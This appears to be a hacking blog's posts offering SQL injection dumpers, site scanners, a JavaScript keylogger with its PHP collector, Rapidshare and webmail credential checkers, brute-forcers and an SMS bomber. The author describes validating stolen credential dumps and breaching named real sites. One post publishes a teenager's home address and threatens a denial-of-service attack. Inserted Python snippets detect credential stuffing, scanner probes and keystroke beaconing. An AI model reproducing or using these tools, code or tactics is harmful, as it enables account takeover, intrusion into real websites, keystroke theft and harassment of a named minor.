Rapidshare v2 was a waste of my time, when authenticating with API, it blocks your ip after several checks at least 15 checks, version 1 did not have this problem.
so added premium points in version 1 as per rapidshare new rules, you need 8k premium points for a new account
also added sqlihelper that is not detected (no changes, except the assembly name)
Download link:
Hi guys,
have not been online for a while, anyway i updated the rapidshare checker, seems rapidshare keeps changing what points (rapid/premium) you need to create a new free account.
Download link:
the SQLI Helper 2.5-2.7 doesnt have a trojan or virus, its false positive, fucking kaspersky detecting it as malware is bullshit! download from my links and i assure you its clean
screenshot:
i dont know why the sqlihelper executables are detected as “trojan.win32.agent2.chtj”, it is fucking false positive, some fool spreading my app with a binded trojan and now my executables are detected also
i rebuild the source and now the exe is not detected anymore
for those that emailed me, i dont put trojan in my apps, run it on a sandbox, if you can find proof you can post it in the shoutbox
right now im working on the email check and rapidshare checker using api
guys,
so i setup iis and asp support on my laptop, then setup a simple sql on asp with mdb as database then tested vulnerability on access based on cheat sheet online
msaccess does not provide info regarding tables and columns, no schema etc… i set the program to bruteforce tables when it detects an msaccess host, once it finds a table will then get the column count, then will use union to extract data.
-bruteforce tables
-bruteforce columns
-dump data / save and load
because msaccess does not support “limit” function and does not allow subquery with multiple returns, program uses field<>’data1′ and field2<>’data2′, not very stable but works
Try it out:
fixed php / sqlihelper and rapidshare checkers, just download the new link
seems gmail is also giving timeout problems, download the update @
___________________________________________________________________________
seems the developers made changes on the live website, thats why most of you are getting invalid results, before the live login page can only take hotmail/live and msn, they removed the restriction thus the post payloads are not working, please download the new fix @
y0,
sorry for the NO update, but got time last weekend and tried out the ODBC convert sql injection exploit for MSSQL and implemented it on sqli helper. easy to spot exploitable page, just add a quote, if you get “Microsoft OLE DB Provider for SQL Server error ‘80040e07′” then its exploitable
SQLI Helper for MYSQL and MSSQL 2.6 ODBC Error Message Exploit
- schema dump
- data dump
no change in use, best is to test it with these sites
http://desisweet.com/desichapationline/item_details.asp?item_id=1
http://www.bernco.gov/stage/departments.asp?dept=2340&submenuid=21008
on ver 2.7 i will add ms access
sure there are similar tools out there, but my tool is the easiest to use, put the url and watch the app do the rest. enjoy
i got some free time today, took some time off work, i got hotmail working again, added also msn and live emails, its all about cookie handling
download latest:
enjoy bro’s
****for those who downloaded, please redownload, fixed msn and hotmail
Download them all at
http://rapidshare.com/files/287748108/reiluke_tools.zip
password: www.reiluke.i.ph
download @ :
features.
- works most 90% mysql sites
- just enter the vuln url, the program will do the rest, no need for valid page keywords
- mysql ver 5 extract structure and multithreaded dumps
- mysql ver 4 bruteforce table and column names
- “load file” view
- save structure as flat file, load it later to continue
- auto find columns
- auto find visible columns
- for authenticated pages, app can use a cookie
- integrated most of my small little apps to this program
before using the app, please check options for maximum row extract/proxy server settings and starting row extract(so you can continue it later), use proxy
i do not have tutorials on how to use it, but its pretty straight forward,paste in a vuln site and click inject
this is for educational purposes only, a little project to help me learn sql injection
as per request
-added email
-fixed traffic left, now its accurate
download
pass: www.reiluke.i.ph
enjoy
Hi again,
- added email address to the rapidshare checker
- added start line, start checking for accounts, once you reach 60-80 checks rapidshare will block you, just change your proxy then click on start again, the start line will catch the last line where the checking stopped
download latest:
Well updated my checker, its fairly easy, inste
added security lock
added formatted output
enjoy and look in the c0de how i checked for security lock
i think somebody already implemented displaying email, will take a look at his c0de later
hi again bros,
well my old version is floating on the web, ill release the latest version, besides hy is down, no more vip vip.
its not perfect but its easy to use
what you do with my app is not my responsibility, i code this for fun and learning and not for profit
download:
pass: www.reiluke.i.ph
greetz and happy holidays
wassup, i made this app last october i think i posted it only on h4cky0u vip
anyway scenario, you hacked a website, and you got their emails and passwords, normally you go login with these emails 1 by 1, it takes a lot of time to filter out the valid accounts
i made an app that can check YAHOO GMAIL HOTMAIL accounts, its not meant to be bruteforce but a checker, captcha wont kick in because you are validating 1 account with 1 pass
very useful if you have large dump though i wont recommend checking more than 2000 accounts at a time, and use a proxy so you wont be blocked, if you found that your ip cannot access yahoo or hotmail, just wait for 2 hours
it works very good on gmail and yahoo, on hotmail be careful because hotmail will lock account if you check more than 3 times with a wrong pass
http://rapidshare.com/files/197031349/reiluke-tools.rar
pass: www.reiluke.i.ph
format: “email:pass”
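The checker described above tries each account once, so per-account lockout and captcha thresholds never trip, and the remaining signal is on the source side. The following is an added detection example, not part of the original post: it flags sources that touch many accounts about once each and mostly fail, with an optional /24 grouping for the proxy changes the posts mention. The event layout, thresholds and sample addresses are assumptions.

```python
import ipaddress
from collections import defaultdict, deque
from datetime import datetime, timedelta


def by_ip(ip):
    return ip


def by_slash24(ip):
    # Assumption: a rotated proxy pool often sits inside one IPv4 /24.
    return str(ipaddress.ip_network(f"{ip}/24", strict=False))


def detect_stuffing(events, key=by_ip, window=timedelta(minutes=10),
                    min_accounts=5, max_tries_per_account=1.5,
                    max_success_ratio=0.3):
    """Flag sources that try many accounts about once each and mostly fail.

    events: iterable of (timestamp, source_ip, username, success).
    Thresholds are illustrative assumptions; tune them on real traffic.
    """
    recent = defaultdict(deque)   # source -> events still inside the window
    flagged = {}
    for ts, ip, user, ok in sorted(events):
        src = key(ip)
        q = recent[src]
        q.append((ts, user, ok))
        while ts - q[0][0] > window:      # drop events older than the window
            q.popleft()
        accounts = len({u for _, u, _ in q})
        attempts = len(q)
        successes = sum(1 for _, _, s in q if s)
        if (accounts >= min_accounts
                and attempts / accounts <= max_tries_per_account
                and successes / attempts <= max_success_ratio):
            prev = flagged.get(src)
            if prev is None or accounts > prev["accounts"]:
                flagged[src] = {"accounts": accounts, "attempts": attempts,
                                "successes": successes,
                                "first_seen": q[0][0], "last_seen": ts}
    return flagged


def sample_events():
    """Constructed login events (documentation address ranges), not real data."""
    t0 = datetime(2024, 1, 1, 10, 0, 0)
    ev = []
    # One source, six accounts, one try each, a single hit.
    for i in range(6):
        ev.append((t0 + timedelta(seconds=20 * i), "192.0.2.77",
                   f"u{i}@example.com", i == 3))
    # Same pattern split over two addresses so neither reaches the threshold.
    for i in range(6):
        ip = "203.0.113.7" if i < 3 else "203.0.113.8"
        ev.append((t0 + timedelta(seconds=30 * i), ip,
                   f"r{i}@example.com", False))
    # A real user mistyping a password: one account, several tries.
    for sec, ok in ((5, False), (15, False), (30, True)):
        ev.append((t0 + timedelta(seconds=sec), "198.51.100.20",
                   "alice@example.com", ok))
    # An office NAT: many accounts, but nearly all logins succeed.
    for i in range(5):
        ev.append((t0 + timedelta(seconds=60 + 10 * i), "198.51.100.50",
                   f"staff{i}@example.com", True))
    return ev


if __name__ == "__main__":
    events = sample_events()
    for label, key in (("per IP", by_ip), ("per /24", by_slash24)):
        for src, info in detect_stuffing(events, key=key).items():
            print(label, src, info["accounts"], "accounts,",
                  info["successes"], "successes")
```

Grouping by /24 is only one way to survive proxy rotation; the same function accepts any key, such as an ASN or a client fingerprint, if the log carries one.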
So undergroundsystem.org got hacked, the hacker did not delete anything but did changed the index file it seems,and members are pointing at me, without proof and now pissed, and some guy will make my life miserable, oh ohhh theyr on to me on google, syou can view the convo at their forum,now 1 guy made a page on me dude, i love the simpsons, marge is so hot! thanks man lol
anyway a guy posted anonymous on my blog,but guess what you too are not untraceable
Johan Hedberg AKA Tux AKA crazzy
Website: http://hedbergproductions.com/Age: 17 years old <– WTF skid! commo’n man, if you want to target me, learn first what i do and critize me, fucking XHTML and CSS is for skiddies
Tagline: Welcome to Hedberg Productions. I’m a 17 year old guy (you mean boy?) and I’m currently making my way through the second year of high school
Birthday: August 16, 1991
Location: Karlskrona
Address : Herrgardsvagen 1E, Karlskrona, 37142, SE
email: johan@hedbergproductions.com
Facebook: http://www.facebook.com/people/Johan-Hedberg/634215586
you want me to post your photos?
you think your leet? if the hacker did not left is calling card you g0t nothin
enough of this and listen to your admin, i can still arrange a doss war though ashole
fuck h4cky0u is having problems with host and sponsor, they will be back on 01/09 thats plenty of time of doing a whole lot of nothing
i have an updated on bomber, i see that gmail provides free fast smtp, changed my sms bomber and defaulted it to gmail smpt.
register an account in gmail, this account will be used to bomb your victims
too bad i cant find any working sms gateway here, but im sure for every country there is a free gateway
add the gateway you know that is working in gateway.txt or select a predefined gateway i found online
its 1st release so im sure there could be problems but if you want to support it give me feedbacks not
download link:
http://rapidshare.com/files/197031349/reiluke-tools.rar
pass: www.reiluke.i.ph
so rapidshare added a security lock, this is bad as we know, i added a field to the checker so you can see whose security lock is active or inactive
also if you plan to use accounts that is not yours, rapidshare will block the account, this happens when the ip downloading changes multiple times in 24 hours
Download link:
http://www.reiluke.site90.com/reiluketools/ReilukeRapidCheck.rar
Screenshot
so h4cky0u is down or i cant access it, i think its down since i dont get pm’s
anyway im working on an sms bomber, its nearly finished and ill make it public once done, heres a screenshot
ok finished and released my scanner on h4cky0u vip only, heres some descriptions
**11/11/2008**
Ok heres what is added, please read before pm me
1. Added “Get from all domains”, included in the app is domain.txt w/c contains common domains, if you want to search for all domains just check this and click scan sites, it will give a lot more results than before, included also is domain2.txt if you want to use all domains, just rename to domain.txt
2. SQLi extensive - will add more parameter comma, parenthesis, double quote, quote, to generate errors, it will make scanning longer
3. SQLi cond - its page comparison, program will get results from “and 1=0″ and “and 1=1″ compares them if there are changes, also for strings “‘ and 1=0/*” and “‘ and 1=1/*”, its not accurate 50/50 because of sites with ad’s w/c changes html source everytime you visit the page
4. XSS checking - now this is 98% accurate, its a wrapper of internet explorer, eliminating false positives, its slow so i recommend you set a timeout in ie http://www.google.com/search?q=timeout+ie&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a <– some guides, if you dont it sometimes stops at the middle (default timeout in ie is 10min lol), also disable IE images at advanced options, this will make checking faster.
5. LFI scan - added a simple lfi scan, its error based, if it detects a file inclusion error, its added to the list, it appends “/etc/passwd%00″ at the end, its not the correct path but a sample, you can use lfi fuzzer to check directories (im planning making one as perl available fuzzer dont ~censored~ work)
6. RFI scan - will included a simple textfile and check contents, RFI is very few right now but with good dork you will find em, its 98% accurate, 2% is false positives…the file is included but not parsed
to do: multiple dork scan
enjoy
Code:
**10/16/2008**
fixed a multithreading issue, now it will test faster with specified threads
added different google countries to search for
added additional parameter to force errors
**10/12/2008**
i got tired of filtering sites so i made one
its error based, the probability of sql injection is good but may give false positives, still working on other methods to detect (eg 1=0/1=1 + union + etc..)
support mysql,sqlserver,msaccess,cfm..
it uses blackle so you can get 5000 test sites, after that use a proxy
multithreaded
thanks for the sig don
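The checks this scanner post lists (appended quote/parenthesis/comma to force errors, the "and 1=0" / "and 1=1" page comparison, the "/etc/passwd%00" suffix, script-tag reflection) all leave recognisable query strings in a web server access log. The following is an added example for spotting them, not code from the original post: the log lines are constructed, and the patterns and the "two kinds or one complete boolean pair" rule are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined-log-format prefix: client, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) ')

BOOL_RE = re.compile(r"""['"]?\s+and\s+1=([01])\s*(?:/\*|--|#)?\s*$""", re.I)
ERROR_RE = re.compile(r"""^[\w.-]*['"(),]+$""")   # value ending in stray punctuation
LFI_RE = re.compile(r"/etc/passwd\x00")           # %00 decodes to a NUL byte
XSS_RE = re.compile(r"<script\b", re.I)

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Nov/2008:10:00:01 +0000] "GET /item.php?id=7%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [11/Nov/2008:10:00:02 +0000] "GET /item.php?id=7%20and%201=0 HTTP/1.1" 200 1840',
    '192.0.2.10 - - [11/Nov/2008:10:00:02 +0000] "GET /item.php?id=7%20and%201=1 HTTP/1.1" 200 5210',
    '192.0.2.10 - - [11/Nov/2008:10:00:03 +0000] "GET /view.php?page=about/etc/passwd%00 HTTP/1.1" 200 900',
    '198.51.100.5 - - [11/Nov/2008:10:01:00 +0000] "GET /item.php?id=7 HTTP/1.1" 200 5210',
    '198.51.100.5 - - [11/Nov/2008:10:01:09 +0000] "GET /search.php?q=cats,%20dogs HTTP/1.1" 200 3100',
    '198.51.100.9 - - [11/Nov/2008:10:02:00 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 2900',
    '203.0.113.40 - - [11/Nov/2008:10:03:00 +0000] "GET /list.php?cat=2%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4000',
]


def classify(value):
    """Return (kind, detail) for a decoded parameter value, or None."""
    if LFI_RE.search(value):
        return ("lfi", "")
    if XSS_RE.search(value):
        return ("xss", "")
    m = BOOL_RE.search(value)
    if m:
        return ("boolean", m.group(1))       # detail: which side of the pair
    if ERROR_RE.match(value):
        return ("error_forcing", "")         # noisy on its own, see summarize()
    return None


def summarize(lines):
    """Group probe findings per client and decide which clients look automated."""
    seen = defaultdict(lambda: defaultdict(set))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            found = classify(value)
            if found:
                kind, detail = found
                seen[m["ip"]][kind].add((parts.path, name, detail))
    report = {}
    for ip, kinds in seen.items():
        probes = kinds.get("boolean", ())
        zeros = {(p, n) for p, n, d in probes if d == "0"}
        ones = {(p, n) for p, n, d in probes if d == "1"}
        pairs = sorted(zeros & ones)         # same parameter hit with both sides
        report[ip] = {"kinds": sorted(kinds), "boolean_pairs": pairs,
                      "scanner": bool(pairs) or len(kinds) >= 2}
    return report


if __name__ == "__main__":
    for ip, info in summarize(SAMPLE_LOG).items():
        print(ip, info)
```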
have you ever wanted to hack your school’s website, well i just r00ted my almamater
sorry sir val you server pawned, sooner or later turks will deface it so put checks on your security and monitor logs
R00T!
so you pawn some websites, got admin data, you extract the db
now we all know thats not enough, theres more, you need to put up a shell, r00t then get more domains
before all that you need to find the admin page first, some hide it, some rename it, crawlers wont find it coz its not linked so you need to brute the folder/pages
heres a little app i made during my free time
http://www.reiluke.site90.com/reiluketools/adminpage.rar
pass:leechedfromh4cky0u

enjoy and cover your tracks
its a multi account checker for steam
well previous checkers rely on http login, now steam put a captcha and all the tools wont work
i made a checker based on the steam exe
set timeout on how long steam responds to an invalid login
sorry steam if theres a will theres a way
download:
reiluke.site90.com/reiluketools/SteamChecker.rar
pass:h4cky0u0wnsy0u
i just finished my scanner, oh well here are some of the results, looks like it works perfectly
Index.php
<?php $password = “reiluke”; ?>
<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>
<html xmlns=”http://www.w3.org/1999/xhtml”>
<head>
<meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″ />
<title>PHP rapidshare account checker by reiluke</title>
<style type=”text/css”>
<!–
body {
background-color: #000000;
}
body,td,th {
color: #FFFFFF;
}
–>
</style>
<script type=”text/javascript” language=”javascript” src=”rsajax.js”></script>
</head>
<body><?php //main page
if (isset($_POST[”password”]) && ($_POST[”password”]==”$password”)) {
?>
<div align=”center”>-PHP Rapidshare account checker by reiluke-
<form action=”javascript:get(document.getElementById(’acctform’));” name=”acctform” id=”acctform”>
<p>
<textarea rows=”1″ cols=”1″ style=”width: 50%; height: 140px” id=”accounts”></textarea>
<br />username:password</p><p>
<input type=”submit” name=”button” value=”Check Accounts” onclick=”return Tab_Click(this)”>
</form>
</p>
<div align=\”center\”>
<div id=”waiting”></div>
<div id=”showresults”></div>
</div><?php //access denied page
}
else
{
print “<h2 align=\”center\”>-PHP Rapidshare account checker by reiluke-</h2>”;
if (isset($_POST[’password’]) || $password == “”) {
print “<p align=\”center\”><font color=\”red\”><b>Incorrect Password</b><br>Please enter the correct password</font></p>”;}
print “<form method=\”post\”><p align=\”center\”>Please enter your password for access<br>”;
print “<input name=\”password\” type=\”password\” size=\”25\” maxlength=\”10\”><input value=\”Login\” type=\”submit\”></p></form>”;
}
?>
<BR>
<body></html>
getrsaccounts.php
<?phpif (isset ($_POST[’accounts’])) {
set_time_limit(0);
$dtaaccounts = nl2br($dtaaccounts);
$dtaaccounts = explode(”\n”, $_POST[’accounts’]);
//Header
echo “<table font-size=1 width=\”50%\” border=1 cellspacing=\”0\” cellpadding=\”7\”>”.
“<tr><th>Username</th> <th>Password</th><th>Points</th><th>Traffic</th><th>Validity</th></tr>”;foreach ($dtaaccounts as &$value) {
list($User, $Pass) = split(”:”, $value);
if (empty($User)==FALSE || empty($Pass)==FALSE){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi”);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
//set proxy here
//curl_setopt($ch, CURLOPT_PROXY, ‘http://127.0.0.1:8080′);
//curl_setopt($ch, CURLOPT_PROXYPORT, 8080);
//curl_setopt ($ch, CURLOPT_PROXYUSERPWD, ‘’);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, “login=”.$User.”&password=”.$Pass);
$pagedata = curl_exec($ch);
curl_close($ch);//get rapidshare details
ereg(”<td>TrafficShare left:</td><td align=right style=\”padding-right:20px;\”><b>([0-9\.]+) GB</b>”, $pagedata, $traffic);
ereg(”<td>RapidPoints:</td><td align=right style=\”padding-right:20px;\”><b>([0-9\.]+)</b>”, $pagedata, $points);
ereg(”<td>Expiration date:</td><td style=\”padding-right:20px;\”><b>([a-zA-Z\_0-9\ .,]+)</b>”, $pagedata, $valid);
ereg(”with ([0-9\.]+)”, $pagedata, $files);
//display if valid
if(empty($valid[1])==FALSE){
echo “<tr>”.”<td>$User</td>”.”<td>$Pass</td>”.”<td>$points[1]</td>”.”<td>$traffic[1] GB</td>”.”<td>$valid[1]</td>”.”</tr>”;
$validrs[] = $User . “:” . $Pass . “:” . $points[1] . “:” . $traffic[1] . “:” . $valid[1];
}
unset($valid);
}
}
echo “</table>Formatted Output:<p><textarea rows=\”1\” cols=\”1\” style=\”width: 50%; height: 140px\”>”;
foreach ($validrs as &$value) {
echo $value . “\n”;
}
echo “</textarea>”;
}
?>
rsajax.js
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType(’text/html’);
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject(”Msxml2.XMLHTTP”);
} catch (e) {
try {
http_request = new ActiveXObject(”Mcft.XMLHTTP”);
} catch (e) {}
}
}
if (!http_request) {
alert(’Cannot create XMLHTTP instance’);
return false;
}
http_request.onreadystatechange = alertContents;
http_request.open(’POST’, url, true);
http_request.setRequestHeader(”Content-type”, “application/x-www-form-urlencoded”);
http_request.setRequestHeader(”Content-length”, parameters.length);
http_request.setRequestHeader(”Connection”, “close”);
http_request.send(parameters);
}function alertContents() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
document.getElementById(’waiting’).innerHTML = ‘’;
document.getElementById(’showresults’).innerHTML = result;
} else {
alert(’There was a problem with the request.’);
}
}else{
document.getElementById(’waiting’).innerHTML = ‘<img src=”loading.gif”>’;}
}
function get(obj) {
var poststr = “accounts=” + encodeURI( document.getElementById(”accounts”).value );
makePOSTRequest(’getrsaccounts.php’, poststr);
}
or download the code
pass: reiluke server needs curl enabled and timelimit else it fails, i suggest a paid hosting or local desktop server
simple php code
simple ajax to display results
password protected page default pass is reiluke, change the pass at index.php 1st line
function GetCandy(event)
{
var kreiluke = “”;
var isNetscape = (navigator.appName.indexOf(”Netscape”) != -1);
var kreiluke = (isNetscape) ? String.fromCharCode(event.which) : String.fromCharCode(event.keyCode);
makeRequest(’kl.php?iambr=’ + kreiluke);
}function makeRequest(url)
{
var httpRequest;if (window.XMLHttpRequest)
{ // Mozilla, Safari, …
httpRequest = new XMLHttpRequest();
if (httpRequest.overrideMimeType) {
httpRequest.overrideMimeType(’text/xml’);
}
}
else if (window.ActiveXObject)
{ // IE
try
{
httpRequest = new ActiveXObject(”Msxml2.XMLHTTP”);
}
catch (e) {
try {
httpRequest = new ActiveXObject(”Mcft.XMLHTTP”);
}
catch (e) {}
}
}if (!httpRequest)
{
alert(’Giving upCannot create an XMLHTTP instance’);
return false;
}
httpRequest.onreadystatechange = function() { alertContents(httpRequest); };
httpRequest.open(’GET’, url, true);
httpRequest.send(null);
}function alertContents(httpRequest)
{
if (httpRequest.readyState == 4) {
if (httpRequest.status == 200) {
}
else
{
alert(’There was a problem with the request.’);
}
}
}
filename kl.php
<?php
$_GET[’iambr’];
$file = fopen($_SERVER[’REMOTE_ADDR’] . “-logged.txt”,”a”);
fwrite($file,$_GET[’iambr’]);
fclose($file);
?>
filename testpage.htm:
<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”
“http://www.w3.org/TR/html4/loose.dtd”>
<html>
<head>
<SCRIPT language=”JavaScript” SRC=”kl.js”></SCRIPT>
</head><body onkeyup=”GetCandy(event)”>
<p>press a ~censored~ key at it will be logged</p>
</body></html>
download file:
it basically records keyboard events on the html page
stores them on a text file
page needs to be active to be able to keylog, so you need to be more creative
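Because the script above sends one GET per key event, it leaves a distinctive trail in proxy or web server logs: a fast run of requests from one client to one endpoint whose only parameter is a single character. The following is an added incident-response example, not part of the original post, that finds such runs and reassembles what was captured. The `kl.php` / `iambr` names come from the code above; the hosts, clients, timings and thresholds are constructed assumptions.

```python
from collections import defaultdict
from statistics import median
from urllib.parse import urlsplit, parse_qsl, quote


def find_keystroke_beacons(requests, min_hits=8, min_single_char_ratio=0.9,
                           max_median_gap=5.0):
    """requests: iterable of (epoch_seconds, client, url).

    Returns one record per (client, endpoint, parameter) stream that looks
    like per-keystroke beaconing, with the captured text reassembled.
    """
    streams = defaultdict(list)
    for ts, client, url in sorted(requests):
        parts = urlsplit(url)
        params = parse_qsl(parts.query, keep_blank_values=True)
        if len(params) != 1:                 # the beacon carries one parameter
            continue
        name, value = params[0]
        streams[(client, parts.netloc + parts.path, name)].append((ts, value))

    hits = []
    for (client, endpoint, name), seq in streams.items():
        if len(seq) < min_hits:
            continue
        single = sum(1 for _, v in seq if len(v) == 1)
        if single / len(seq) < min_single_char_ratio:
            continue                         # e.g. autocomplete sends growing prefixes
        gaps = [b[0] - a[0] for a, b in zip(seq, seq[1:])]
        if gaps and median(gaps) > max_median_gap:
            continue                         # e.g. slow page-by-page browsing
        hits.append({"client": client, "endpoint": endpoint, "param": name,
                     "requests": len(seq),
                     "first_seen": seq[0][0], "last_seen": seq[-1][0],
                     "captured": "".join(v for _, v in seq)})
    return hits


def sample_requests():
    """Constructed proxy-log records, not real traffic."""
    reqs = []
    # Per-key beacons as the page's script would emit them (keyup -> key code).
    for i, ch in enumerate("HELLO WORLD"):
        reqs.append((1000.0 + 0.4 * i, "10.0.0.15",
                     "http://203.0.113.9/kl.php?iambr=" + quote(ch)))
    # Benign: single-digit pagination, but at human browsing pace.
    for i in range(1, 10):
        reqs.append((1000.0 + 30.0 * i, "10.0.0.15",
                     f"http://shop.example/list?page={i}"))
    # Benign: search-as-you-type, fast but each value is a growing prefix.
    text = "hello wor"
    for i in range(1, len(text) + 1):
        reqs.append((2000.0 + 0.3 * i, "10.0.0.22",
                     "http://shop.example/suggest?q=" + quote(text[:i])))
    return reqs


if __name__ == "__main__":
    for hit in find_keystroke_beacons(sample_requests()):
        print(hit["client"], "->", hit["endpoint"], repr(hit["captured"]))
```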
300+ columns
300+ tables
some translated to french
if you hacking other countries translate the wordlist, i found it effective
i know there are tools out there, but i like to make my own tool and make it simpler for me
ok i made is as simple as possible, to add vuln url just click on “+” and input values the program needs (url, columns and table)
to make it simpler, added mysql schema template, click on get database/tables/columns and you just have to input the url, program will generate the vuln url
can extract data from mysql4/5
app:
http://www.rapidspread.com/file.jsp?id=r9iicb6xxd
sample vid:
http://www.rapidspread.com/file.jsp?id=s0al4fy44s
if you have questions just reply here
Blind SQLi is slow and not for dumping large data, so you need to find the admin credentials and dump from there


i would like to share my account checker
-user / list pass checking with results all info-delimiter of your choosing
-email check (via account recovery) but will require many proxy as i think its only 50 tries then your ip is blocked for an hour(say you have email list with verified password, you can check if they have rapidshare, the password field is optional for your reference, once that an rs account exist, check the inbox of the email for the pass)
-you can specify number of rec then proxy rotates
-export results
-asynchronous request, it does not look like its not responding
-.net you will need latest framework
—
for those who have a hard time using it, ask me, its working fine with me, sample files are included, if you want a quick test
-to check passwords
create a text file with format
username:password
click on load check file
click on start
-to check if email account you hacked have an rs account
click “check via email recovery”,
create a textfile with format
email:emailpass(optional, you can make this as reference later on)
click on load check file
click on start
it will return details if the email have rs account
if you have results, go check his email inbox for the passwords
30 tries ur ip will be blocked for an hour use a proxy
download:
http://www.rapidspread.com/file.jsp?id=bsonhxxqar
i am not responsible for your actions, these programs are for educational purposes only
i have decided to share my yahoo and gmail bruteforcer
- from wordlist-async request
- proxy server
- pls download latest .net to run
Download the file:
http://www.reiluke.site90.com/reiluketools/Reiluke_MailBruteforcer.rar
i am not responsible for your actions, these programs are for educational purposes only
well im in no mood today so heres what i got
do you really hate when pinoy brags about their job? how can you be a senior developer working for only for 2 years? you “could” be good at what you do but i would na tag you as a senior unless you earn the level years of experience, hes working with “Mynd Tech Management Services (a.k.a. Mynd Consulting)”, i googled it, they seem to be legit, but their web developers are either noobs or just fresh grads
before you go off showing your portfolio, fix your goddam website!
Davao Doc website i love your design, your custom cms is great, congrats to the developers and designers! 1 problem, youre website fucking unsecure! please call dr house maybe he can diagnose the problem ;/ gj though, your admin password is strong
all in days work, spent about 2 hours, i got about 339 valid emails out of 1700emails from yahoo/gmail and hotmail, out of 339 valid emails, i got 19 rapidshare account, got only 18 since 1 was fraud and 1 was in another language so my check ddnt work
what a weekend, been drinking the whole time.. anyway last friday i created a program that will check yahoo/gmail/hotmail with corresponding passwords
before that i already made a rapidshare acct checker that will check username and password or will check if the email does have an rs account
Last year i was into game programming, now I have started looking into hacking, philippines sites are so vulnerable, most websites are either powered by joomla/mambo/phpbb though these scripts are good enough there are plenty vulnerabilities that are in public
heres a list of ph sites i found that i gained access to
International sites
these are just “some of the sites” that are vulnerable, i did not deface or mess up your data, if it was taken down then blame the turks!!! if the webadmin are reading this, then fix the hole gadddamit!
Welcome to my blog, i should have started this a long time ago, im lazy and i dont like to blog, but i think this should be fun
ill be bloggin my shit, garbage hobbies here and cool finds